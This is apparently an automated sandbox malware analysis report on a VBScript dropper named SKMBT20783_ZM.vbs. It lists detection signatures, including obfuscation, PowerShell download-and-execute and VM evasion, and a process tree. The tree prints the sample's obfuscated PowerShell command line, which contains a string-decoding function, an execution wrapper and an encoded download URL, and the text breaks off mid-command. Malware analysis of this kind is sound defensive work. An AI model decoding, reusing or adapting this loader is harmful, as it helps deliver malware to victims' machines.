Windows
Analysis Report
SKMBT20783_ZM.vbs
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
wscript.exe (PID: 1432 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\SKMBT 20783_ZM.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) WmiPrvSE.exe (PID: 5420 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) powershell.exe (PID: 4020 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Rus sule; func tion Tvang smiddels($ Backgeared ){$Submerg e=4;do {$I ma+=$Backg eared[$Sub merge];$Pj at=Format- List;$Subm erge+=5} u ntil(!$Bac kgeared[$S ubmerge])$ Ima}functi on Ankomst erne($Dolo rs20){ .($ Indeficien cy) ($Dolo rs20)}$Erg oterapeuts koler=Tvan gsmiddels 'Int,NHype eMeteTObel .NykaW';$E rgoterapeu tskoler+=T vangsmidde ls ',ngeEC lieBErn cT ricLHalviC en,eHom nF orst';$Pos tethmoid=T vangsmidde ls 'SivaMT ogfoDemizE triVarslB ulllFlaca Da /';$Rec uperator=T vangsmidde ls ' SinT A.ol Mi.sv o d1Vi k2' ;$Destalin ises136=' Nov[PussNB ukseMisttG evi. WilS veeSkylrSv anVan oI S emc DiseAf tepBetiO S toiWestn T ,ltKlynM L acahydrNEf t AEl aG B dE DisrSu pp]Henv:Gu nh: SmasCo r E LreC a coustewrBa rgiFlu tPu piyFu fP y mpRItenOSu lptOffeOFi naC,alaoHa anlJ,me=Se nd$ TyfrSg ekEMythC S toUEmbeP e skePolir , araU maTBe stOK,olR'; $Postethmo id+=Tvangs middels 'J nan5 Phr.C ham0cel, P h,n(AssiWI n.eiHe enC o ndRiddo NonwCo gsP syc AbroNF odeTNeut P se1Ddni0ge nn. Shi0 U nd; Ana Sq uiWAnstiW, rbnInte6 T in4Pers; H ys AntexSp ej6 Lus4ki rk;Farb U, fjrGeo.vMa cr:Efte1B ot3No.i4 S ,u. egu0 n vr)term Ma .GLatieSva lcIndsk Ud moAmts/Rep r2G rn0Ker n1 niv0Del s0N bo1.ru g0Re d1Tom o SlibFUd. eiAabnru.r eeRamsf Si goRef xudv /Fode1fry g3 Dem4Der v.Retr0';$ pseudocost a=Tvangsmi ddels 'can nUud.rsPra cE SemRGua r-Bu ia ha rGOpb,ePhi lNHotet';$ Butter=Tva ngsmiddels ' rsthLam itBrent ,o rpSubesant h:amat/I.g m/nordaAud ig Selh Si naM gryD s kehelmzBog kaMaoiyGni de MetaOun ctChee. I diTrffrOil c/ intkB.h aiPr,cd Ve dsBrom/ Ca tTwienyVek .rKanvoT.a dsAfgiiDuk knM kseOmn is Sub.Pu. hlEngazMel lh';$Misfo rtuner=Tva ngsmiddels 'Sag,>';$ Indeficien cy=Tvangsm iddels 'Sa gi eade P ,rX';$Semi definitene ss139='Vaa benmrkerne ';$Fiskerf laaden='\H ikes.Ove'; Ankomstern e (Tvangsm iddels ' v a$AtteGSub slhumaO ag tbHeksahan dlTelt: St aN WhiEUdr uPEsc eA r aNBrodd em miF gesAvi s=evol$slu tESt rNSan gvDavi: Al iA SnnpUnd .PNotrdWhy daA phT De vaRepa+Beu $Kibyf oa iGibbs lbr KGe meB,gg r PosFHals LTandAPost AExo.dR vr EBilln');A nkomsterne (Tvangsmi ddels 'Lig e$Sed,GBe tL,resoSou nBTrumaFor llOpb :Ver mKOdondcli nf CerUO k rlAngsdObc l= Svl$Ind ubsog UAnt it athtWir ee MesRPro f. EvoS Un dpb sclLeg eiSjllTIn u( I f$ Ha aMKompI L, dSPropFBil lOUranR br aT TilUCri sNK.oaeOms lrSkid)'); Ankomstern e (Tvangsm iddels $De stalinises 136);$Butt er=$Kdfuld [0];$Keyse at=(Tvangs middels ' Lim$ QuiG, orsL,ubboU nivBCensAO verlTjen:P i.kIModfnP l sFp ntO ,ksrFrinMK um ATr.nT. abbIXy ioP araNGomeSD egliPo iND odedOldnST opaAK imTB ulbsTils=S ucrn,alsEU mu w Tyd-D elsOInt,B. undJInhaEK ir cIn eTR